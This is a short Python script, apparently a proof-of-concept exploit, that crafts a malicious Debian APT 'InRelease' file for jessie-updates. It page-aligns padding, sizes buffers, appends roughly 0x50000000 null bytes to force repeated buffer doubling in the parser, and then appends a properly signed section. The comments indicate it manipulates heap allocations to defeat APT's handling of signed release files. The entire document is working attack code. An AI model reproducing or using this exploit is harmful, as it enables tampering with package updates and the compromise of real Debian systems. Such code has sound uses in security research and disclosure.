#!/usr/bin/env python
part1 = open('debian/dists/jessie-updates/InRelease.part1', 'rb').read() + '\n\n'
part2 = open('debian/dists/jessie-updates/InRelease.part2', 'rb').read()

# one page of short padding lines
padding_page = ('A'*127 + '\n') * 32

# pad part1 to the next page boundary, with a newline at the end
output = part1 + padding_page[:0x1000-(len(part1)+1)%0x1000] + '\n'
assert (len(output)&0xfff) == 0

# bump buffer size to 0xb71
# one byte nullbyte, one byte newline
output += (0xb71 - 2) * 'B' + '\n'

# page-align again, so that the next part immediately requests allocation size 0x1000 (causing a double to 0x16e2).
# we don't want the first request to be for ~0x48f and then the next one for ~0x148f.
output = output + padding_page[:0x1000-(len(output)+1)%0x1000] + '\n'
assert (len(output)&0xfff) == 0

# then double a lot
output = output + '\0'*0x50000000 + '\n'

# finally append the properly-signed section
output = output + part2

open('debian/dists/jessie-updates/InRelease', 'wb', 0).write(output)
